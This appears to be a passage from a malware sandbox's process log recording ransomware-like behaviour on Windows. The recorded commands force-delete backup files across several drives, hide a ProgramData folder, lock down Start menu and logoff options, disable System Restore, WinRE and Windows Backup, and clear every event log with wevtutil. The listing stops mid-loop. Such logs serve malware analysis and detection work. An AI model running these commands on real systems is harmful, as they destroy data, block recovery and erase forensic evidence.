C:\Windows\system32\cmd.exe /c del /s /f /q d:*.VHD d:*.bac d:*.bak d:*.wbcat d:*.bkf d:Backup*.* d:ackup*.* d:*.set d:*.win d:*.dsk
2⤵
PID:1956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q e:*.VHD e:*.bac e:*.bak e:*.wbcat e:*.bkf e:Backup*.* e:ackup*.* e:*.set e:*.win e:*.dsk
2⤵
PID:268

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q f:*.VHD f:*.bac f:*.bak f:*.wbcat f:*.bkf f:Backup*.* f:ackup*.* f:*.set f:*.win f:*.dsk
2⤵
PID:1028

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q g:*.VHD g:*.bac g:*.bak g:*.wbcat g:*.bkf g:Backup*.* g:ackup*.* g:*.set g:*.win g:*.dsk
2⤵
PID:1772

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q h:*.VHD h:*.bac h:*.bak h:*.wbcat h:*.bkf h:Backup*.* h:ackup*.* h:*.set h:*.win h:*.dsk
2⤵
PID:2036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del %0
2⤵
PID:1084

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s HRMPUB
2⤵
PID:544

C:\Windows\system32\attrib.exe
attrib +h +s HRMPUB
3⤵
- Views/modifies file attributes
PID:948

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\HRMPUB
2⤵
PID:1760

C:\Windows\system32\attrib.exe
attrib +h +s C:\ProgramData\HRMPUB
3⤵
- Views/modifies file attributes
PID:880

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f
2⤵
PID:636

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f
3⤵
PID:592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f
2⤵
PID:1156

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f
3⤵
PID:688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
2⤵
PID:1560

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
3⤵
PID:1368

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f
2⤵
PID:1948

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f
3⤵
PID:1800

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f
2⤵
PID:1232

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f
3⤵
PID:1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f
2⤵
PID:1652

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f
3⤵
PID:1144

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
2⤵
PID:1708

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
3⤵
PID:1940

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
2⤵
PID:1776

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
3⤵
PID:1280

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f
2⤵
PID:1596

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f
3⤵
PID:772

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f
2⤵
PID:1532

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f
3⤵
PID:2028

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
2⤵
PID:756

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
3⤵
PID:1908

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
2⤵
PID:1808

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
3⤵
PID:292

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
2⤵
PID:1844

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
3⤵
PID:204

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f
2⤵
PID:536

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f
3⤵
PID:300

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
2⤵
PID:540

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
3⤵
PID:236

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f
2⤵
PID:224

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f
3⤵
PID:232

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
2⤵
PID:216

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
3⤵
PID:208

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
2⤵
PID:364

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
3⤵
PID:924

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
2⤵
PID:1916

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
3⤵
PID:1268

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
2⤵
PID:672

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
3⤵
PID:1736

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
2⤵
PID:1936

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
3⤵
PID:760

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
2⤵
PID:1980

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
3⤵
PID:1768

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
2⤵
PID:1956

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
3⤵
PID:268

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
2⤵
PID:1028

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
3⤵
PID:1772

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
2⤵
PID:2036

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
3⤵
PID:1084

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
2⤵
PID:948

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
3⤵
PID:544

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
2⤵
PID:880

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
3⤵
PID:1760

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
2⤵
PID:592

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
3⤵
PID:636

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
2⤵
PID:688

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
3⤵
PID:1156

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
2⤵
PID:1368

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
3⤵
PID:1560

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
2⤵
PID:1800

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
3⤵
PID:1948

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
2⤵
PID:1012

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
3⤵
PID:1232

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c for /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"
2⤵
PID:1144

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wevtutil.exe el
3⤵
PID:1652

C:\Windows\system32\wevtutil.exe
wevtutil.exe el
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1940

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Analytic"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1100

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Application"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1776

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "DebugChannel"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:788

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "DirectShowFilterGraph"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2028

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "DirectShowPluginControl"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1312

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Els_Hyphenation/Analytic"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:756

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "EndpointMapper"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:432

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "ForwardedEvents"
3⤵
PID:204

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "HardwareEvents"
3⤵
PID:1728

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Internet Explorer"
3⤵
PID:536

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Key Management Service"
3⤵
PID:1608

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MF_MediaFoundationDeviceProxy"
3⤵
PID:232

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Media Center"
3⤵
PID:1292

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationDeviceProxy"
3⤵
PID:216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationPerformance"
3⤵
PID:1628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationPipeline"
3⤵
PID:1268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationPlatform"
3⤵
PID:828

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-IE/Diagnostic"
3⤵
PID:672

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-IEDVTOOL/Diagnostic"
3⤵
PID:1716

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"
3⤵
PID:1768

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"
3⤵
PID:580

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"
3⤵
PID:1224

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"
3⤵
PID:1028

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ADSI/Debug"
3⤵
PID:1740

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-API-Tracing/Operational"
3⤵
- Clears Windows event logs
PID:544

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ATAPort/General"
3⤵
PID:524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"
3⤵
PID:880

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"
3⤵
PID:868

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AltTab/Diagnostic"
3⤵
PID:1156

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppID/Operational"
3⤵
PID:1928

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"
3⤵
PID:1368

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"
3⤵
PID:1388

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"
3⤵
PID:1232

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"
3⤵
PID:1720

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"
3⤵
- Clears Windows event logs
PID:1604

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"
3⤵
PID:1280

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Problem-Steps-Recorder"
3⤵
- Clears Windows event logs
PID:1968

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"
3⤵
PID:1596

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"
3⤵
PID:1856

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"
3⤵
PID:1908

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory/Debug"
3⤵
PID:712

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"
3⤵
PID:1808

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"
3⤵
PID:1160

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/Operational"
3⤵
PID:300

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/Performance"
3⤵
PID:1536

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audit/Analytic"
3⤵
PID:220

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"
3⤵
PID:228

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"
3⤵
PID:212

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Backup"
3⤵
PID:924

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"
3⤵
PID:1328

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"
3⤵
PID:1252

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"
3⤵
- Clears Windows event logs
PID:1528

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"
3⤵
PID:760

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"
3⤵
PID:896

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"
3⤵
PID:888

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"
3⤵
- Clears Windows event logs
PID:1944

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"
3⤵
PID:1360

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"
3⤵
PID:1084

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"
3⤵
PID:1620

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"
3⤵
PID:948

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"
3⤵
PID:588

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CDROM/Operational"
3⤵
PID:636

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/Analytic"
3⤵
PID:468

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"
3⤵
PID:688

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Calculator/Debug"
3⤵
PID:1996

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Calculator/Diagnostic"
3⤵
PID:1948

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"
3⤵
PID:1988

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"
3⤵
PID:1012

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"
3⤵
PID:1940

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"
3⤵
PID:1960

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"
3⤵
PID:772

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"
3⤵
PID:1932

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"
3⤵
PID:1532

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"
3⤵
- Clears Windows event logs
PID:1448

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"
3⤵
- Clears Windows event logs
PID:292

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"
3⤵
PID:1992

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"
3⤵
PID:1844

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"
3⤵
- Clears Windows event logs
PID:1524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"
3⤵
PID:1456

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"
3⤵
PID:2040

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"
3⤵
PID:1608

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"
3⤵
PID:232

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"
3⤵
PID:1292

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"
3⤵
PID:216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"
3⤵
PID:1628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DXGI/Logging"
3⤵
PID:1268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DXP/Analytic"
3⤵
- Clears Windows event logs
PID:828

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"
3⤵
PID:672

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"
3⤵
PID:1716

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"
3⤵
PID:1768

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"
3⤵
PID:1516

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceSync/Analytic"
3⤵
PID:1944

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceSync/Operational"
3⤵
PID:1360

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceUx/Informational"
3⤵
- Clears Windows event logs
PID:1084

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceUx/Performance"
3⤵
PID:1620

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Admin"
3⤵
- Clears Windows event logs
PID:948

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Operational"
3⤵
PID:524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DhcpNap/Admin"
3⤵
PID:880

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DhcpNap/Operational"
3⤵
PID:868

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Admin"
3⤵
PID:1156

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Operational"
3⤵
PID:1928

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DiagCpl/Debug"
3⤵
PID:1964

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Analytic"
3⤵
PID:1388

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Debug"
3⤵
PID:1348

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Operational"
3⤵
- Clears Windows event logs
PID:1720

